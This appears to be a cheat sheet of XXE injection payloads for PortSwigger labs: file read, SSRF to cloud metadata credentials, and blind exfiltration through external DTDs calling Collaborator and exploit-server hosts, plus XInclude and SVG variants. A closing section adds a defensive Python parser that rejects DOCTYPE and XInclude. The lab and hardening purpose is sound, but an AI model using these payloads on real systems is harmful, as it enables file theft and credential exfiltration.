PortSwigger XXE Injection XML File Read SSRF Blind

XXE Injection

XML External Entity injection for file read, SSRF and out-of-band data exfiltration.

Custom XML entities

XML
<!DOCTYPE foo [ <!ENTITY myentity "my entity value" > ]>

Exploiting XXE — Retrieve files

XML — /etc/passwd
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
  <productId>
    &xxe;
  </productId>
</stockCheck>

Exploiting XXE — SSRF attacks

XML — AWS metadata
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
<stockCheck>
  <productId>1&xxe;</productId>
  <storeId>1</storeId>
</stockCheck>

Blind XXE — Out-of-band interaction

Basic OOB
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR.oastify.com"> ]>
<stockCheck>
  <productId>1&xxe;</productId>
  <storeId>1</storeId>
</stockCheck>

Via XML parameter entities (%)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://BURP-COLLABORATOR.oastify.com"> %xxe; ]>
<stockCheck>
  <productId>1</productId>
  <storeId>2</storeId>
</stockCheck>

Blind XXE — Exfiltrate data via malicious external DTD

Request XML
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM
"https://EXPLOIT-SERVER.exploit-server.net/exploit"> %xxe;]>
<stockCheck>
  <productId>1</productId>
  <storeId>1</storeId>
</stockCheck>
Payload on the external server (exploit)
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://COLLABORATOR.oastify.com/?x=%file;'>">
%eval;
%exfiltrate;

Blind XXE — Retrieve data via error messages

Request XML
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM
"https://EXPLOIT-SERVER.exploit-server.net/exploit"> %xxe;]>
<stockCheck>
  <productId>1</productId>
  <storeId>1</storeId>
</stockCheck>
Payload on the external server (error)
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

Exploiting XXE — Repurpose a local DTD

XML
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamso '
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;error;
  '>
  %local_dtd;
]>
<stockCheck>
  <productId>1</productId>
  <storeId>1</storeId>
</stockCheck>

Hidden attack surface

XInclude attacks
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>

XXE via file upload (SVG)
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>
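Every payload above depends on the parser honouring a DOCTYPE (general entities, parameter entities, an external DTD) or an XInclude element. The following is an added example, not part of the original cheat sheet or of PortSwigger's labs: a stockCheck parser built on Python's standard-library expat bindings that refuses any DOCTYPE, refuses external entity references, never loads parameter entities, and rejects XInclude elements by namespace. The function names (parse_stock_check, is_rejected) and the sample messages are constructed for this example.

```python
"""DTD-refusing XML parser using only the Python standard library (xml.parsers.expat).

Policy: a stockCheck message may not carry a DOCTYPE at all, may not reference
external entities, and may not contain elements from the XInclude namespace.
"""
import xml.parsers.expat as expat

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"


class UnsafeXML(ValueError):
    """Raised when the document uses a construct the policy forbids."""


def parse_stock_check(xml_bytes: bytes) -> dict:
    """Parse a <stockCheck> document into {child tag: text}, enforcing the policy."""
    # namespace_separator makes element names arrive as "<uri> <local>", so the
    # XInclude check cannot be dodged by choosing a different prefix than "xi".
    parser = expat.ParserCreate(namespace_separator=" ")
    # Never fetch external parameter entities (external DTD subsets).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    result = {}
    stack = []   # open element local names
    text = []    # character data collected per open element

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Refusing every DOCTYPE removes the internal subset too, so no
        # <!ENTITY ...> declaration (general or parameter) can ever be processed.
        raise UnsafeXML(f"DOCTYPE {name!r} not allowed")

    def on_external_entity(context, base, system_id, public_id):
        # Returning 0 makes expat abort the parse instead of fetching the resource.
        return 0

    def on_start(name, attrs):
        ns, _, local = name.rpartition(" ")
        if ns == XINCLUDE_NS:
            raise UnsafeXML("XInclude not allowed")
        stack.append(local)
        text.append("")

    def on_chars(data):
        if text:
            text[-1] += data

    def on_end(name):
        local = stack.pop()
        value = text.pop().strip()
        if stack:  # children of the root become entries; the root itself is the container
            result[local] = value

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_chars
    parser.EndElementHandler = on_end

    try:
        parser.Parse(xml_bytes, True)
    except expat.ExpatError as exc:
        # Malformed input, or expat stopped because an external entity was refused.
        raise UnsafeXML(f"malformed or blocked XML: {exc}") from exc
    return result


def is_rejected(xml_bytes: bytes) -> bool:
    """True if the policy rejects the document, False if it parses cleanly."""
    try:
        parse_stock_check(xml_bytes)
    except UnsafeXML:
        return True
    return False


# Constructed sample inputs: one benign message and the payload shapes from the
# cheat sheet (external entity, parameter entity, XInclude).
BENIGN = b'<?xml version="1.0"?><stockCheck><productId>1</productId><storeId>2</storeId></stockCheck>'
FILE_READ = (b'<?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
             b'<stockCheck><productId>&xxe;</productId></stockCheck>')
PARAM_ENTITY = (b'<?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://example.invalid/"> %xxe; ]>'
                b'<stockCheck><productId>1</productId></stockCheck>')
XINCLUDE = (b'<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
            b'<xi:include parse="text" href="file:///etc/passwd"/></foo>')

if __name__ == "__main__":
    print(parse_stock_check(BENIGN))
    for sample in (FILE_READ, PARAM_ENTITY, XINCLUDE):
        print("rejected" if is_rejected(sample) else "accepted")
```

The check is deliberately coarse: rather than trying to distinguish harmless internal entities from dangerous external ones, it refuses the DOCTYPE outright, which is what the common hardening settings in other stacks (disallow-doctype-decl in Java, resolve_entities=False and no_network in lxml) also do. Parsers that run XInclude as a post-processing step still need the namespace check, because XInclude works without any DTD.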

Other ways to encode %

&#x25;
&#37;